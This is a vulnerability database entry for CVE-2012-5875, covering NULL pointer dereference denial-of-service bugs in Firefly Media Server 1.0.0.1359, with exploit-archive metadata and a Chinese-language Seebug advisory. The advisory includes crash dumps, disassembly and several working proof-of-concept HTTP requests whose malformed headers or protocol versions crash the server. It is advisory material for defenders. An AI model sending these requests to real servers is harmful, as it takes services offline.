Vulnerabilities > CVE-2012-5875 - Unspecified vulnerability in Fireflymediaserver Firefly Media Server 1.0.0.1359
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN fireflymediaserver
exploit available
Summary
Firefly Media Server 1.0.0.1359 allows remote attackers to cause a denial of service (NULL pointer dereference) via a (1) crafted Connection HTTP header; a return carriage control character in the (2) Accept Language header, (3) User-agent header, (4) Host header, or (5) protocol version; or a (6) crafted HTTP protocol version.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Exploit-Db
description | FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference. CVE-2012-5875. Dos exploit for windows platform |
file | exploits/windows/dos/23574.txt |
id | EDB-ID:23574 |
last seen | 2016-02-02 |
modified | 2012-12-21 |
platform | windows |
port | |
published | 2012-12-21 |
reporter | High-Tech Bridge SA |
source | https://www.exploit-db.com/download/23574/ |
title | FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference |
type | dos |
Packetstorm
data source | https://packetstormsecurity.com/files/download/118963/firefly-null.txt |
id | PACKETSTORM:118963 |
last seen | 2016-12-05 |
published | 2012-12-20 |
reporter | High-Tech Bridge SA |
source | https://packetstormsecurity.com/files/118963/FireFly-Mediaserver-1.0.0.1359-NULL-Pointer-Dereference.html |
title | FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference |
Seebug
bulletinFamily | exploit |
description | BUGTRAQ ID: 56999 CVE(CAN) ID: CVE-2012-5875 Firefly Media Server是开源的音频媒体服务器。 Firefly Media Server 1.0.0.1359及其他版本存在多个空指针引用漏洞,恶意用户可利用这些漏洞造成远程服务器崩溃。 1)"firefly.exe"文件内的HTTP CONNECTION标头没有正确处理,通过发送特制的报文到9999/TCP端口,可导致空指针引用,造成受影响服务器立即崩溃。 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> n 0n-us,en;q=0.5U) (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx_xxxx_ (stack) ESI: 0175eef5 ( 24506101) -> 0n-us,en;q=0.5U) (stack) EBP: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) ESP: 0175eed0 ( 24506064) -> u0p xxxxxxx_xxxx_n 0n-us,en;q=0.5U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vpx@ (stack) +0c: 00708830 ( 7374896) -> p3xpPppHFF../../../../ (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl PoC GET / HTTP/1.1 Host: vulnhost.local User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: xxxxxxx_xxxx_ Referer: http://www.host.com 2)"firefly.exe"文件内的ACCEPT-LANGUAGE, USER-AGENT和HOST HTTP标头参数没有正确处理,通过向9999/TCP端口发送特制的报文,可造成空指针引用,导致拒绝服务。 a) ACCEPT-LANGUAGE 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> nguage /5.0 (Windows; U) (stack) EDI: 0175eee8 ( 24506088) -> (stack) ESI: 0175eefa ( 24506106) -> /5.0 (Windows; U) (stack) EBP: 00708830 ( 7374896) -> p3xxpppHFF (heap) ESP: 0175eed0 ( 24506064) -> u0pguage /5.0 (Windows; U) (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> uw0</er<uuu\w@wu)|</er<uu|0|Aw<pv@vp x (stack) +0c: 00708830 ( 7374896) -> p3xxpppHFF (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl POC GET / HTTP/1.1 Host: somehost.com User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us en;q=0.5 \r\n Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com b) USER-AGENT 崩溃细节 EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> t t (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx(stack) ESI: 0175eef5 ( 24506101) -> t (stack) EBP: 007087d8 ( 7374808) -> p>ppPp<p (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxxt t (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> p>ppPp<p (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl PoC: GET / HTTP/1.1 Host: somehost.com User-Agent: xxxxxxx \r\n Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com c) HOST 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 0175eeef ( 24506095) -> (stack) EBP: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!ppp\pHFF"& (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl PoC: GET / HTTP/1.1 Host: xxxxxxx\r\n User-Agent: Mozilla/5.0 (Windows; U) Accept-Language: en-us,en;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://www.host.com 3)"firefly.exe"文件内的HTTP POST和GET方法没有正确处理,通过向9999/TCP端口发送特制报文,可导致空指针引用,造成服务器崩溃。 a) HTTP POST 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 007087d8 ( 7374808) -> ppPpatp (heap) ESP: 0175eed0 ( 24506064) -> upxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 007087d8 ( 7374808) -> ppPpatp (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,b PoC: POST /index.html HTTP/ xxxxxxxx .1 b) HTTP GET 崩溃细节: EIP: 0041e223 cmp byte [ecx],0x20 EAX: 0175eee8 ( 24506088) -> xxxxxxx (stack) EBX: 00000000 ( 0) -> N/A ECX: 00000000 ( 0) -> N/A EDX: 0175eef0 ( 24506096) -> (stack) EDI: 0175eee8 ( 24506088) -> xxxxxxx (stack) ESI: 00000001 ( 1) -> N/A EBP: 00708830 ( 7374896) -> p!pppHFF#) (heap) ESP: 0175eed0 ( 24506064) -> u0pxxxxxxx (stack) +00: 00000000 ( 0) -> N/A +04: 00000001 ( 1) -> N/A +08: 0175ff80 ( 24510336) -> N/A +0c: 00708830 ( 7374896) -> p!pppHFF#) (heap) +10: 00000000 ( 0) -> N/A +14: 00000007 ( 7) -> N/A 反汇编: 0x0041e206 jnz 0x41e223 0x0041e208 mov edx,[ebp+0x4] 0x0041e20b push edi 0x0041e20c push edx 0x0041e20d push dword 0x4525e0 0x0041e212 push byte 0x2 0x0041e214 push byte 0x2 0x0041e216 call 0x40ea90 0x0041e21b add esp,0x14 0x0041e21e jmp 0x41e160 0x0041e223 cmp byte [ecx],0x20 0x0041e226 jnz 0x41e232 0x0041e228 inc ecx 0x0041e229 mov [esp+0x10],ecx 0x0041e22d cmp byte [ecx],0x20 0x0041e230 jz 0x41e228 0x0041e232 mov eax,ecx 0x0041e234 lea esi,[eax+0x1] 0x0041e237 mov dl,[eax] 0x0041e239 inc eax 0x0041e23a cmp dl,bl PoC: GET /index.html HTTP/xxxxxxxx.1 Proof of concept #2: The following HTTP request will crash the vulnerable Firefly server remotely: GET /index.html HTTP/ xxxxxxxx.1 0 Firefly Media Server 厂商补丁: fireflymediaserver ------------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.fireflymediaserver.org/ |
id | SSV:60523 |
last seen | 2017-11-19 |
modified | 2012-12-21 |
published | 2012-12-21 |
reporter | Root |
title | Firefly Media Server firefly.exe畸形HTTP请求远程拒绝服务漏洞 |
References
- http://archives.neohapsis.com/archives/bugtraq/2012-12/0115.html
- http://archives.neohapsis.com/archives/bugtraq/2012-12/0115.html
- http://www.exploit-db.com/exploits/23574
- http://www.exploit-db.com/exploits/23574
- http://www.securitytracker.com/id?1027917
- http://www.securitytracker.com/id?1027917
- https://www.htbridge.com/advisory/HTB23129
- https://www.htbridge.com/advisory/HTB23129